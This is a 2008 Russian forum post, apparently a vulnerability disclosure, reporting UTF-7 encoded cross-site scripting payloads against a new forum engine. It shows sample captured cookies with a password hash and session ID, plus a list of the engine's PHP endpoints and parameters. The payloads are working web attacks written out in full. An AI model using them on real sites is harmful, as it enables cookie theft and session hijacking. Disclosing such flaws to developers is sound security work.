Тема: Новый форумный движок
Показать сообщение отдельно

Cross-site Scripting Overview
  #16  
Старый 19.04.2008, 03:25
Flame of Soul
Участник форума
Регистрация: 25.05.2007
Сообщений: 290
Провел на форуме:
1740746

Репутация: 435
Отправить сообщение для Flame of Soul с помощью MSN
По умолчанию Cross-site Scripting Overview
Cross-site Scripting Overview ---> RFC-2152 UTF-7

Личные данные -> Дополнительная информация:

+ADwA-/textarea+AD4A-+ADwA-script+AD4A-alert(document.cookie)+ADsAPA-/script+AD4A-


Пример срабатывания:
<dxboard.ru>
username=test;
pass=8b9f3f128a5c4b26e93a307bb9af770;
PHPSESSID=ve59bljfsff0jcop3t51m2pp4bg9m1q1

Тестовый форум -> Оффтоп

+ADw-/title+AD4APA-script+AD4-alert(document.cookie)+ADsAPA-/script+AD4-


Пример срабатывания:

<dxboard.ru>
username=test;
pass=8b9f3f128a5c4b26e93a307bb9af770;
PHPSESSID=ve59bljfsff0jcop3t51m2pp4bg9m1q1;
tread=%3B7%3A1208553717%3B8%3A1208557570;
treadids=%3B7%3A44%3B8%3A45

Подробнее прочитать можно тут:

http://forum.antichat.ru/threadnav66154-2-10.html

PS: Существенную опасность представляет второй случай, особенно в том плане если будет выпушенна англоязычная версия форума, так что с этим лучше заранее разобратся.

----------------------------------------------------------------------

Вспомогательная информация (мож кому пригодится)

Список файлов с параметрами:
Код HTML:
/findmessages.php?id=1&page=1&sort=1    /logs.php?dat=1 
/users.php?page=1&order=1&pr=1&srch=    /check.php?act=3 
/findmessages.php?id=1&page=1           /addrate.php?id=1
/adminsmiles.php?dat=5&id=              /addrate.php?id=1
/viewtopic.php?id=3&last=1              /users.php?srch=1
/adminforums.php?dat=5&id=              /writepm.php?id=1 
/admintopic.php?&opt=3&id=              /profile.php?id=1
/deleteallmes.php?folder=               /deleteimg.php?id= 
/viewpercents.php?n=1&id=               /viewforum.php?id=1
/delcontact.php?act=1&id=               /viewgroup.php?id=1
/bookedit.php?act=1&id=3                /logs.php?dat=2&id= 
/viewtopic.php?id=1&fp=1                /fullanswer.php?id=
/addrate.php?id=1&plus=1                /viewtopic.php?id=3
/profile.php?id=1&view=1                /deletefile.php?id=
/subedit.php?act=4&id=3                 /deletetopic.php?id=
/viewtopic.php?id=3&l=1            !!!  /ipblock.php?dat=3&id=
/deletemessage.php?id=                  /mesopts.php?act=1&id=
/deletepercent.php?id=                  /viewpercents.php?id=1 
/findmessages.php?id=1                  /deleteprofile.php?id=
ipblock.php - чесно говоря смущает
Последний раз редактировалось Flame of Soul; 19.04.2008 в 04:05..
 
Ответить с цитированием